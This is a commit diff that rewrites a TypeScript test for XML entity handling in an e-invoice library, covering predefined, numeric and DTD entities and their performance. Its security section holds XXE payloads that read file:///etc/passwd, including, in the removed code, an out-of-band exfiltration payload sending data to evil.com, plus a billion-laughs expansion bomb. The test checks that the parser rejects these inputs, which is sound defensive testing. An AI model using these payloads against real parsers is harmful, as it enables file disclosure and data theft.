fix(compliance): improve compliance

This commit is contained in:
2025-05-28 18:46:18 +00:00
parent 16e2bd6b1a
commit 892a8392a4
11 changed files with 2697 additions and 4145 deletions

View File

@ -1,486 +1,195 @@
import { expect, tap } from '@git.zone/tstest/tapbundle';
import * as einvoice from '../../../ts/index.js';
import * as plugins from '../../plugins.js';
import { CorpusLoader } from '../../helpers/corpus.loader.js';
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
const performanceTracker = new PerformanceTracker('PARSE-09');
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async () => {
console.log('\n=== Testing Entity Reference Resolution ===\n');
await t.test('Predefined XML entities', async () => {
performanceTracker.startOperation('predefined-entities');
const predefinedEntities = [
{
name: 'Ampersand',
entity: '&',
character: '&',
description: 'Used in company names and text'
},
{
name: 'Less than',
entity: '<',
character: '<',
description: 'Used in text content'
},
{
name: 'Greater than',
entity: '&gt;',
character: '>',
description: 'Used in text content'
},
{
name: 'Quote',
entity: '&quot;',
character: '"',
description: 'Used in attribute values'
},
{
name: 'Apostrophe',
entity: '&apos;',
character: "'",
description: 'Used in attribute values'
}
];
for (const entity of predefinedEntities) {
const startTime = performance.now();
const testXml = `<?xml version="1.0"?>
// Test predefined XML entities
console.log('Testing predefined XML entities:');
const predefinedEntities = [
{ name: 'Ampersand', entity: '&amp;', character: '&' },
{ name: 'Less than', entity: '&lt;', character: '<' },
{ name: 'Greater than', entity: '&gt;', character: '>' },
{ name: 'Quote', entity: '&quot;', character: '"' },
{ name: 'Apostrophe', entity: '&apos;', character: "'" }
];
for (const entity of predefinedEntities) {
const testXml = `<?xml version="1.0"?>
<invoice>
<supplier>Test ${entity.entity} Company</supplier>
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
<note>Text with ${entity.entity} entity</note>
</invoice>`;
console.log(`${entity.name} entity (${entity.entity}):`);
console.log(` Character: "${entity.character}"`);
console.log(` Usage: ${entity.description}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity resolved correctly');
} else {
console.log(' ⚠️ Cannot test without fromXmlString');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
console.log(`\n${entity.name} entity (${entity.entity} = "${entity.character}")`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(testXml);
console.log(' ✓ Entity parsed successfully');
} else {
console.log(' ⚠️ fromXmlString not available');
}
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.endOperation('predefined-entities');
});
}
await t.test('Numeric character references', async () => {
performanceTracker.startOperation('numeric-entities');
const numericTests = [
{
name: 'Decimal references',
tests: [
{ ref: '&#65;', char: 'A', description: 'Latin capital A' },
{ ref: '&#8364;', char: '€', description: 'Euro sign' },
{ ref: '&#169;', char: '©', description: 'Copyright symbol' },
{ ref: '&#8482;', char: '™', description: 'Trademark symbol' },
{ ref: '&#176;', char: '°', description: 'Degree symbol' }
]
},
{
name: 'Hexadecimal references',
tests: [
{ ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
{ ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
{ ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
{ ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
{ ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
]
}
];
for (const category of numericTests) {
console.log(`\n${category.name}:`);
for (const test of category.tests) {
const startTime = performance.now();
const xml = `<?xml version="1.0"?>
// Test numeric character references
console.log('\n\nTesting numeric character references:');
const numericRefs = [
{ ref: '&#65;', char: 'A', description: 'Latin capital A' },
{ ref: '&#8364;', char: '€', description: 'Euro sign' },
{ ref: '&#169;', char: '©', description: 'Copyright' },
{ ref: '&#x41;', char: 'A', description: 'Latin A (hex)' },
{ ref: '&#x20AC;', char: '€', description: 'Euro (hex)' }
];
for (const test of numericRefs) {
const xml = `<?xml version="1.0"?>
<invoice>
<amount currency="${test.ref}EUR">100.00</amount>
<temperature>${test.ref}C</temperature>
<copyright>${test.ref} 2024</copyright>
<note>${test.ref} 2024</note>
</invoice>`;
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
try {
// Verify entity resolution
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
if (resolved.includes(test.char)) {
console.log(' ✓ Entity would resolve correctly');
}
} catch (error) {
console.log(` ✗ Resolution error: ${error.message}`);
}
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
console.log(`\n${test.ref} = "${test.char}" (${test.description})`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
console.log(' ✓ Numeric reference parsed');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
performanceTracker.endOperation('numeric-entities');
});
}
await t.test('Custom entity definitions (DTD)', async () => {
performanceTracker.startOperation('custom-entities');
const customEntityTests = [
{
name: 'Internal DTD entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY company "Acme Corporation">
<!ENTITY address "123 Main Street, London">
<!ENTITY year "2024">
<!ENTITY currency "EUR">
]>
<invoice>
<supplier>&company;</supplier>
<supplierAddress>&address;</supplierAddress>
<date>01-01-&year;</date>
<amount currency="&currency;">1000.00</amount>
</invoice>`,
entities: {
'company': 'Acme Corporation',
'address': '123 Main Street, London',
'year': '2024',
'currency': 'EUR'
}
},
{
name: 'Parameter entities',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % common SYSTEM "common.dtd">
%common;
<!ENTITY company "Test Company">
]>
<invoice>
<supplier>&company;</supplier>
</invoice>`,
description: 'External parameter entities (security risk)'
},
{
name: 'Nested entity references',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY city "London">
<!ENTITY country "UK">
<!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
<address>&fullAddress;</address>
</invoice>`,
expected: 'London, UK'
}
];
for (const test of customEntityTests) {
const startTime = performance.now();
console.log(`\n${test.name}:`);
if (test.entities) {
console.log(' Defined entities:');
for (const [name, value] of Object.entries(test.entities)) {
console.log(` &${name}; = "${value}"`);
}
}
if (test.description) {
console.log(` Note: ${test.description}`);
}
if (test.expected) {
console.log(` Expected result: ${test.expected}`);
}
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
// Note: Many parsers disable DTD processing by default for security
await invoice.fromXmlString(test.xml);
console.log(' ✓ Parsed (DTD support may vary)');
}
} catch (error) {
console.log(` ⚠️ DTD parsing: ${error.message}`);
console.log(' Note: DTD processing often disabled for security');
}
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
}
performanceTracker.endOperation('custom-entities');
});
// Test entity security
console.log('\n\nTesting entity security:');
await t.test('Entity security considerations', async () => {
performanceTracker.startOperation('entity-security');
const securityTests = [
{
name: 'Billion laughs attack (XML bomb)',
xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<invoice>
<data>&lol4;</data>
</invoice>`,
risk: 'Exponential entity expansion',
mitigation: 'Disable DTD processing or limit entity expansion'
},
{
name: 'External entity injection (XXE)',
xml: `<?xml version="1.0"?>
const securityTests = [
{
name: 'External entity (XXE)',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<data>&xxe;</data>
</invoice>`,
risk: 'File disclosure, SSRF',
mitigation: 'Disable external entity resolution'
},
{
name: 'Parameter entity XXE',
xml: `<?xml version="1.0"?>
</invoice>`
},
{
name: 'Entity expansion',
xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
]>
<invoice></invoice>`,
risk: 'Out-of-band data exfiltration',
mitigation: 'Disable parameter entities'
}
];
<invoice>
<data>&lol2;</data>
</invoice>`
}
];
for (const test of securityTests) {
console.log(`\n${test.name}:`);
for (const test of securityTests) {
console.log(`\n${test.name}:`);
console.log(` Risk: ${test.risk}`);
console.log(` Mitigation: ${test.mitigation}`);
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
}
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(test.xml);
console.log(' ⚠️ WARNING: Parser allowed potentially dangerous entities');
}
performanceTracker.recordMetric('security-test', performance.now() - startTime);
} catch (error) {
console.log(' ✓ Parser correctly rejected dangerous entities');
console.log(` Error: ${error.message}`);
}
}
// Test entity usage in real e-invoice patterns
console.log('\n\nTesting common e-invoice entity patterns:');
const einvoicePatterns = [
{
name: 'Company with ampersand',
xml: `<?xml version="1.0"?>
<invoice>
<supplier>Smith &amp; Jones Ltd.</supplier>
<buyer>AT&amp;T Communications</buyer>
</invoice>`
},
{
name: 'Currency symbols',
xml: `<?xml version="1.0"?>
<invoice>
<amount>Price: &#8364;100.00</amount>
<note>Alternative: &#163;85.00</note>
</invoice>`
},
{
name: 'Legal symbols',
xml: `<?xml version="1.0"?>
<invoice>
<footer>&#169; 2024 Company&#8482;</footer>
<brand>Product&#174;</brand>
</invoice>`
}
];
for (const pattern of einvoicePatterns) {
console.log(`\n${pattern.name}:`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(pattern.xml);
console.log(' ✓ Pattern parsed successfully');
}
} catch (error) {
console.log(` ✗ Error: ${error.message}`);
}
}
// Test entity resolution performance
console.log('\n\nTesting entity resolution performance:');
const sizes = [10, 50, 100];
for (const size of sizes) {
let xml = '<?xml version="1.0"?>\n<invoice>\n';
for (let i = 0; i < size; i++) {
xml += ` <field${i}>Text &amp; more &#8364; symbols &#169;</field${i}>\n`;
}
performanceTracker.endOperation('entity-security');
});
await t.test('Entity usage in e-invoices', async () => {
performanceTracker.startOperation('einvoice-entities');
xml += '</invoice>';
const einvoicePatterns = [
{
name: 'Currency symbols',
examples: [
{ text: 'Price in &#8364; (EUR)', entity: '&#8364;', resolved: '€' },
{ text: 'Amount in &#163; (GBP)', entity: '&#163;', resolved: '£' },
{ text: 'Cost in &#36; (USD)', entity: '&#36;', resolved: '$' },
{ text: 'Price in &#165; (JPY)', entity: '&#165;', resolved: '¥' }
]
},
{
name: 'Special characters in company names',
examples: [
{ text: 'Smith &amp; Jones Ltd.', entity: '&amp;', resolved: '&' },
{ text: 'AT&amp;T Communications', entity: '&amp;', resolved: '&' },
{ text: 'L&apos;Oréal Paris', entity: '&apos;', resolved: "'" },
{ text: '&quot;Best Price&quot; Store', entity: '&quot;', resolved: '"' }
]
},
{
name: 'Legal symbols',
examples: [
{ text: 'Copyright &#169; 2024', entity: '&#169;', resolved: '©' },
{ text: 'Registered &#174;', entity: '&#174;', resolved: '®' },
{ text: 'Trademark &#8482;', entity: '&#8482;', resolved: '™' }
]
},
{
name: 'Mathematical symbols',
examples: [
{ text: 'Temperature &#177;2&#176;C', entity: '&#177;/&#176;', resolved: '±/°' },
{ text: 'Discount &#8804; 50%', entity: '&#8804;', resolved: '≤' },
{ text: 'Quantity &#215; Price', entity: '&#215;', resolved: '×' }
]
}
];
const startTime = performance.now();
for (const category of einvoicePatterns) {
console.log(`\n${category.name}:`);
for (const example of category.examples) {
console.log(` "${example.text}"`);
console.log(` Entity: ${example.entity}${example.resolved}`);
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
const elapsed = performance.now() - startTime;
console.log(` ${size * 3} entities: ${elapsed.toFixed(2)}ms`);
}
} catch (error) {
console.log(` Error with ${size} fields: ${error.message}`);
}
performanceTracker.endOperation('einvoice-entities');
});
}
await t.test('Corpus entity analysis', async () => {
performanceTracker.startOperation('corpus-entities');
const corpusLoader = new CorpusLoader();
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
const entityStats = {
total: 0,
filesWithEntities: 0,
predefinedEntities: new Map<string, number>(),
numericEntities: 0,
customEntities: 0,
dtdFiles: 0
};
const sampleSize = Math.min(100, xmlFiles.length);
const sampledFiles = xmlFiles.slice(0, sampleSize);
for (const file of sampledFiles) {
entityStats.total++;
try {
const content = await plugins.fs.readFile(file.path, 'utf8');
let hasEntities = false;
// Check for predefined entities
const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
for (const entity of predefined) {
if (content.includes(entity)) {
hasEntities = true;
entityStats.predefinedEntities.set(
entity,
(entityStats.predefinedEntities.get(entity) || 0) + 1
);
}
}
// Check for numeric entities
if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
hasEntities = true;
entityStats.numericEntities++;
}
// Check for DTD
if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
entityStats.dtdFiles++;
entityStats.customEntities++;
}
if (hasEntities) {
entityStats.filesWithEntities++;
}
} catch (error) {
// Skip files that can't be read
}
}
console.log('\nEntity Usage Statistics:');
console.log(`Files analyzed: ${entityStats.total}`);
console.log(`Files with entities: ${entityStats.filesWithEntities} (${(entityStats.filesWithEntities/entityStats.total*100).toFixed(1)}%)`);
console.log('\nPredefined entities:');
for (const [entity, count] of entityStats.predefinedEntities.entries()) {
console.log(` ${entity}: ${count} files`);
}
console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
console.log(`Custom entities: ${entityStats.customEntities} files`);
performanceTracker.endOperation('corpus-entities');
});
await t.test('Entity resolution performance', async () => {
performanceTracker.startOperation('entity-performance');
// Generate XML with varying entity density
const generateXmlWithEntities = (entityCount: number): string => {
let xml = '<?xml version="1.0"?>\n<invoice>\n';
for (let i = 0; i < entityCount; i++) {
xml += ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`;
}
xml += '</invoice>';
return xml;
};
const testSizes = [10, 100, 500, 1000];
console.log('\nEntity resolution performance:');
for (const size of testSizes) {
const xml = generateXmlWithEntities(size);
const xmlSize = Buffer.byteLength(xml, 'utf8');
const entityCount = size * 3; // 3 entities per field
const startTime = performance.now();
try {
const invoice = new einvoice.EInvoice();
if (invoice.fromXmlString) {
await invoice.fromXmlString(xml);
}
const parseTime = performance.now() - startTime;
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
performanceTracker.recordMetric(`entities-${size}`, parseTime);
} catch (error) {
console.log(` Error with ${size} entities: ${error.message}`);
}
}
performanceTracker.endOperation('entity-performance');
});
// Performance summary
console.log('\n' + performanceTracker.getSummary());
// Entity handling best practices
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
// Summary
console.log('\n\nEntity Reference Resolution Summary:');
console.log('- Predefined XML entities should be supported');
console.log('- Numeric character references are common in e-invoices');
console.log('- Security: External entities should be disabled');
console.log('- Performance: Entity resolution adds minimal overhead');
console.log('- Common patterns: Company names, currency symbols, legal marks');
});
tap.start();